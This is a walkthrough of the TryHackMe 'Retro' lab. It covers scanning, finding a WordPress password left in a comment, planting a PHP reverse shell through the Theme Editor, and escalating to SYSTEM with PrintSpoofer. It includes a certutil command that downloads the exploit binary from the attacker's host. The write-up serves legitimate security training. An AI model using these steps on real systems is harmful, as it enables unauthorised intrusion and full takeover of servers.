TryHackMe — Retro Write Up
Challenge Link: https://tryhackme.com/room/retro
(This write up does not follow the intended path given by hints)
Table of Contents
1. Enumeration
2. Initial Access
3. Privilege Escalation
Enumeration
After starting the machine on the TryHackMe, we begin our enumeration phase by kicking off an nmap scan.
Since the room specifies that the machine does not respond to ping, we include the -Pn
flag for nmap. The full command is:
nmap -T4 -p- -vv -A -Pn <target_ip>
Our nmap scan reveals that 2 ports are open: 80 and 3389.
We can first check Exploit-DB for any vulnerabilities in the Microsoft IIS httpd 10.0 version identified, but nothing turns up. So, since port 80 is open, we continue by further enumerating the web service. We visit the webpage, but it’s just a default Windows IIS landing page.
Let’s continue enumerating and run nikto and gobuster. The scans are:
nikto -h http://<target_ip>/
gobuster dir -u http://<target_ip>/ -w ../dirbuster/directory-list-2.3-medium.txt -t 100
The initial nikto scan doesn’t turn up anything too interesting, but the gobuster scan reveals the directory that we are looking for.
Visiting the new found directory and viewing the page source reveals it is a WordPress site. Let’s run another nikto scan on this too (we can also run wpscan but it wasn’t necessary here). While the second nikto scan is running, let’s manually go through the site and see if we can find anything interesting…
The posts on the site are posted by a user Wade. We also come across a post with a comment by Wade, leaving a note for himself.
Since we have a user and now, possibly, a password. Let’s try to log in with these credentials…
From any of the posts on the right hand side of the page, we can find the login page (or because it is a WordPress site, we can guess /wp-login.php).
Heading to the login page, we try the credentials…
On a side note, let’s look back at our second nikto scan. One interesting line stood out with the directory that we found…
Let’s go there and see what we find (leaving off the >;
in the url ). It appears to be the entire structure of the website.
We can also find the previous comment in here to get Wade’s password.
And following this link to view the comments…
Getting back on track now…
Initial Access
We have successfully logged in as the user Wade and are presented with the admin dashboard for the WordPress site. A common way to get a reverse shell is to use the Theme Editor to modify a .php file.
Within the Theme Editor, we can pick any .php file that we can modify…
We’ll use the archive.php file here. You can add in your favorite PHP reverse shell, noting the machine is running Windows.
With our netcat listener waiting patiently, we visit:
../wp-content/themes/90s-retro/archive.php
to have our php code executed.
Upon visiting the page, we get our reverse shell as iis apppool\retro.
Privilege Escalation
Enumerating the machine for a privilege escalation vector is short lived. We can run whoami /priv
to see we have SeImpersonatePrivilege Enabled.
There are a few well-known ways to escalate privileges with SEImpersonatePrivilege enabled. For example, from hacktricks…
For this write up, we will use PrintSpoofer and transfer it with certutil.
https://github.com/itm4n/PrintSpoofer
certutil -urlcache -split -f http://<host_ip>:<port>/PrintSpoofer.exe
Running systeminfo
reveals the machine is x64,
but the PrintSpoofer64.exe doesn’t run. So we try again with PrintSpoofer32.exe, and it works.
We are now nt authority\system and can retrieve the user and root flags.